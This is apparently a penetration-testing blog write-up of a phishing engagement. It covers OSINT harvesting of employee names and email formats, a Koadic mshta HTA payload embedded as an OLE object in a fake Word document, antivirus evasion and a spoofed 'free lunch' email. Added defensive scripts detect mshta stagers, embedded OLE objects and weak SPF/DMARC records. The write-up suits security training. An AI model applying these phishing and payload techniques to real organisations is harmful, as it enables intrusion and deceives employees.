How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information

June 7, 2019

The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, aside from the company name, we were given “ZERO” information to perform an external black-box penetration test.

This external black-box penetration test was performed for a client referred to here as Hackme.

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools to assist in gathering emails, subdomains, hosts, employee names, etc. from different public sources like search engines and Shodan. There is an exhaustive list of such awesome tools here.

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization, still working with nothing beyond its name.

With Google dorks to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx”.


Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint, and Excel). One can also use FOCA for this.


From this, I noticed that employee emails followed a particular naming convention: the first letter of the first name + surname @ domain.com, i.e. [email protected].

Armed with this knowledge, we pulled from LinkedIn the list of all current employees of Hackme using the following Google dork syntax:

site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.

By hacking together a script to automate the process, we copied out the first names, last names and the roles of the current employees of Hackme.

A tiring approach is to manually crawl through the Google result pages in search of these names and roles; alternatively, one can use GoogleScraper:

GoogleScraper -m http --keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json

Result (the GoogleScraper JSON output, shown as a screenshot in the original post):

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.


Then, using your favorite editor (Word mail merge, Notepad++, etc.) or some scripting skills, combine each first name and last name according to the naming convention to form your email list.

Feed our Target list a Payload

Since we are simulating a black-box penetration test, we decided (just as an attacker would) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via email to employees of Hackme.

We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.

What made it really stand out, aside from the beautiful interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables, using the “stager/js/mshta” module (serves payloads in memory using MSHTA.exe HTML Applications).


The result was our HTA payload URL, as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url“.

In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.


Thankfully, we saw the tip on the left from Matt Nelson and, interestingly, the team at NCC Group has this implemented in Demiguise.

So here is our final payload saved as a .hta file.


The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft Word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the Word document and the embedded OLE object.
  3. This spawns a new process and we get shell access to our victim’s PC.
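The attack scenario above is also the defender's detection opportunity: an HTA run this way appears as mshta.exe started by an Office process, or as mshta.exe handed a remote URL. The block below is an added example (not code from the original post, nor from Koadic or Demiguise) that applies those checks to constructed Sysmon-style process-creation events; the field names Image, ParentImage and CommandLine follow Sysmon Event ID 1, and the IP address, user name and file names in the sample lines are made up.

```python
"""Added example (not from the original post or from Koadic/Demiguise): flag
process-creation events where mshta.exe is started by an Office application,
is handed a remote URL, or runs an .hta out of a user profile directory.
Field names follow Sysmon Event ID 1; the log lines are constructed sample data."""
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\", re.IGNORECASE)

# Constructed sample events: one per line, key=value pairs separated by "|".
# The IP address (TEST-NET range), user name and file names are made up.
SAMPLE_EVENTS = """\
EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|CommandLine=mshta http://192.0.2.10:9999/index.hta
EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=mshta C:\\Users\\jdoe\\Downloads\\lunch-menu.hta
EventID=1|Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad readme.txt
EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=mshta C:\\ProgramData\\Vendor\\setup.hta
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value|key=value' line into a dict of fields."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (last backslash-separated component)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means no finding."""
    reasons: List[str] = []
    if basename(event.get("Image", "")) != "mshta.exe":
        return reasons
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS:
        reasons.append(f"mshta.exe spawned by Office process {parent}")
    if URL_RE.search(cmd):
        reasons.append("mshta.exe given a remote URL (in-memory HTA stager pattern)")
    if USER_PROFILE_RE.search(cmd):
        reasons.append("HTA run from a user profile directory")
    return reasons


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run classify() over every event line and collect the findings."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings.append({"command": event.get("CommandLine", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["command"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The fourth sample line is deliberately left unflagged: an .hta launched by Explorer from a vendor directory under ProgramData is what a legitimately packaged HTML Application looks like, so a rule that fires on every mshta.exe start would drown the analyst in noise. The parent-process and URL checks are the ones that separate the scenario described above from that baseline.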

Now we get to the interesting part: we need our victim to open the Microsoft Word document and our payload.

To do this, we need a very compelling story, because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behavior. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor, a platform that gives you the inside scoop on companies, with employee reviews about salaries, benefits, and the pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

  1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
  2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?

Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email, complete with a Hackme email signature and consistent with the organization’s email culture, would be ideal.

Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to LinkedIn to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.


We are halfway through sending our payload now. Have some patience and read on…

It’s time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.

I then created a new Word document like the one shown below, a spitting image of the Hackme document template with appropriate headers/footers.

Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.
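Both the document-metadata recon from the OSINT section and the OLE-package embedding described here are things a defender can check for in a .docx, since the file is just a zip of XML parts. The block below is an added example (not code from the original post, nor from FOCA) that builds a constructed sample document in memory and triages it: it reads the creator, last-modified-by and company fields from docProps/core.xml and docProps/app.xml, and lists anything under word/embeddings/, checking whether it carries the OLE compound-file header. The person and company strings (Jane Doe, jsmith, Hackme) are constructed.

```python
"""Added example (not code from the original post or from FOCA): triage a .docx
before it is published (what names does its metadata leak?) or when it arrives
by mail (does it carry an embedded OLE package?). A .docx is a zip of XML parts,
so only the standard library is needed. The sample document is constructed here."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound-file header

# Constructed metadata parts; the person and company names are made up.
CORE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
    "<dc:creator>Jane Doe</dc:creator>"
    "<cp:lastModifiedBy>jsmith</cp:lastModifiedBy>"
    "</cp:coreProperties>"
)
APP_XML = (
    f'<Properties xmlns="{NS["ep"]}">'
    "<Application>Microsoft Office Word</Application>"
    "<Company>Hackme</Company>"
    "</Properties>"
)


def build_sample_docx(metadata: bool = True, embed: bool = True) -> bytes:
    """Build a minimal constructed .docx, optionally with metadata and an embedded package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        if metadata:
            z.writestr("docProps/core.xml", CORE_XML)
            z.writestr("docProps/app.xml", APP_XML)
        if embed:
            # Insert > Object > Package stores the file as an OLE compound object here.
            z.writestr("word/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def extract_metadata(docx_bytes: bytes) -> Dict[str, str]:
    """Read author/company fields from docProps/core.xml and docProps/app.xml."""
    found: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for label, path in (("creator", "dc:creator"), ("last_modified_by", "cp:lastModifiedBy")):
                node = root.find(path, NS)
                if node is not None and node.text:
                    found[label] = node.text
        if "docProps/app.xml" in names:
            root = ET.fromstring(z.read("docProps/app.xml"))
            for label, path in (("application", "ep:Application"), ("company", "ep:Company")):
                node = root.find(path, NS)
                if node is not None and node.text:
                    found[label] = node.text
    return found


def embedded_objects(docx_bytes: bytes) -> List[Dict[str, object]]:
    """List parts under word/embeddings/ and whether each has the OLE header."""
    objs: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("word/embeddings/"):
                data = z.read(name)
                objs.append({"part": name, "size": len(data),
                             "is_ole_compound": data[:8] == OLE_MAGIC})
    return objs


def triage(docx_bytes: bytes) -> Dict[str, object]:
    """Combine both checks into a list of human-readable findings."""
    meta = extract_metadata(docx_bytes)
    objs = embedded_objects(docx_bytes)
    findings: List[str] = []
    for key in ("creator", "last_modified_by", "company"):
        if key in meta:
            findings.append(f"metadata leaks {key}: {meta[key]}")
    for obj in objs:
        kind = "OLE compound object" if obj["is_ole_compound"] else "embedded part"
        findings.append(f"{kind} at {obj['part']} ({obj['size']} bytes)")
    return {"metadata": meta, "embedded": objs, "findings": findings}


if __name__ == "__main__":
    for line in triage(build_sample_docx())["findings"]:
        print(line)
```

Run against a real file by passing its bytes to triage(); the same two checks cover the pre-publication case (strip or anonymise the creator and company fields before a document goes on the public site, so the naming convention cannot be read off them) and the inbound case (a Word attachment carrying an OLE package, especially one whose icon has been changed to look like a document, is worth holding at the gateway).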

Don’t Forget the Anti-virus!!!

To check the AV detection rate of our payload, and to see if it would be flagged as malicious by Hackme’s antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because, according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.


AV Scan of our .hta payload (0 detections)

It’s Time to Send our Email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address.
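As an added example (not from the original post), here is how a defender can check that precondition from the domain's published TXT records. The record strings and domain names are constructed; in practice fetch them with `dig TXT example.com` and `dig TXT _dmarc.example.com`, or with dnspython's dns.resolver.resolve(name, "TXT"). DKIM is left out because verifying it needs the selector name, which is not discoverable from the domain alone.

```python
"""Added example (not from the original post): judge from a domain's SPF and
DMARC TXT records whether a third party could send mail as one of its
addresses. The record strings below are constructed sample data."""
from typing import Dict, List, Optional

# Constructed records for three made-up domains: (domain TXT, _dmarc TXT).
SAMPLES: Dict[str, tuple] = {
    "weak.example":    (["v=spf1 include:_spf.mail.example ?all"], []),
    "partial.example": (["v=spf1 mx ~all"], ["v=DMARC1; p=quarantine; pct=50"]),
    "strong.example":  (["v=spf1 mx -all"], ["v=DMARC1; p=reject; rua=mailto:dmarc@strong.example"]),
}


def parse_spf(txt_records: List[str]) -> Optional[Dict[str, object]]:
    """Find the SPF record and the qualifier on its 'all' mechanism (+, -, ~ or ?)."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return None
    qualifier = None
    for term in spf[0].split()[1:]:
        if term.lower().lstrip("+-~?") == "all":
            qualifier = term[0] if term[0] in "+-~?" else "+"  # default qualifier is +
    return {"record": spf[0], "all": qualifier, "multiple": len(spf) > 1}


def parse_dmarc(txt_records: List[str]) -> Optional[Dict[str, str]]:
    """Parse the tag=value pairs of a DMARC record into a dict."""
    dmarc = [r for r in txt_records if r.lower().startswith("v=dmarc1")]
    if not dmarc:
        return None
    tags: Dict[str, str] = {}
    for pair in dmarc[0].split(";"):
        key, _, value = pair.strip().partition("=")
        if key:
            tags[key.strip().lower()] = value.strip()
    return tags


def spoofing_risk(domain_txt: List[str], dmarc_txt: List[str]) -> Dict[str, object]:
    """Return the issues found and an overall level: high, medium or low."""
    spf = parse_spf(domain_txt)
    dmarc = parse_dmarc(dmarc_txt)
    issues: List[str] = []
    if spf is None:
        issues.append("no SPF record: any host may send as this domain")
    else:
        if spf["all"] is None:
            issues.append("SPF has no 'all' mechanism: unlisted senders get a neutral result")
        elif spf["all"] in ("+", "?"):
            issues.append(f"SPF ends in '{spf['all']}all': unlisted senders are not rejected")
        if spf["multiple"]:
            issues.append("more than one SPF record: evaluates to permerror (RFC 7208)")
    if dmarc is None:
        issues.append("no DMARC record: receivers apply no policy on SPF/DKIM failure")
    elif dmarc.get("p", "none") == "none":
        issues.append("DMARC p=none: failures are only reported, mail is still delivered")
    elif dmarc.get("pct", "100") != "100":
        issues.append(f"DMARC pct={dmarc['pct']}: policy applied to only part of the mail")
    enforced = dmarc is not None and dmarc.get("p", "none") in ("quarantine", "reject")
    if spf is None or not enforced:
        level = "high"
    elif issues:
        level = "medium"
    else:
        level = "low"
    return {"spf": spf, "dmarc": dmarc, "issues": issues, "level": level}


def assess_all(samples: Dict[str, tuple] = SAMPLES) -> Dict[str, str]:
    """Overall level per domain, handy for a quick table."""
    return {name: spoofing_risk(*records)["level"] for name, records in samples.items()}


if __name__ == "__main__":
    for name, records in SAMPLES.items():
        result = spoofing_risk(*records)
        print(f"{name}: {result['level']}")
        for issue in result["issues"]:
            print("   -", issue)
```

The point of the level rule is that SPF on its own does not stop spoofing: without an enforcing DMARC policy (p=quarantine or p=reject) a receiver has no instruction to act on an SPF failure, so the display name and From address can still be imitated. Note also that none of this helps against the look-alike Gmail account described next, which passes SPF and DMARC for gmail.com; that case is one for user awareness and for flagging external senders whose display name matches an internal employee.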

In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name, and then spiced it up with his signature, which was obtained earlier.


Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!


What next?

The rest, as they often say, is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins.

In conclusion

All in all, this was a very fun engagement. Whilst it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy for one to gain access by exploiting the human factor.

“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said

“Give me six hours to chop down a tree and I will spend the first four sharpening the axe”.

Original Source & Credits: 

Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.
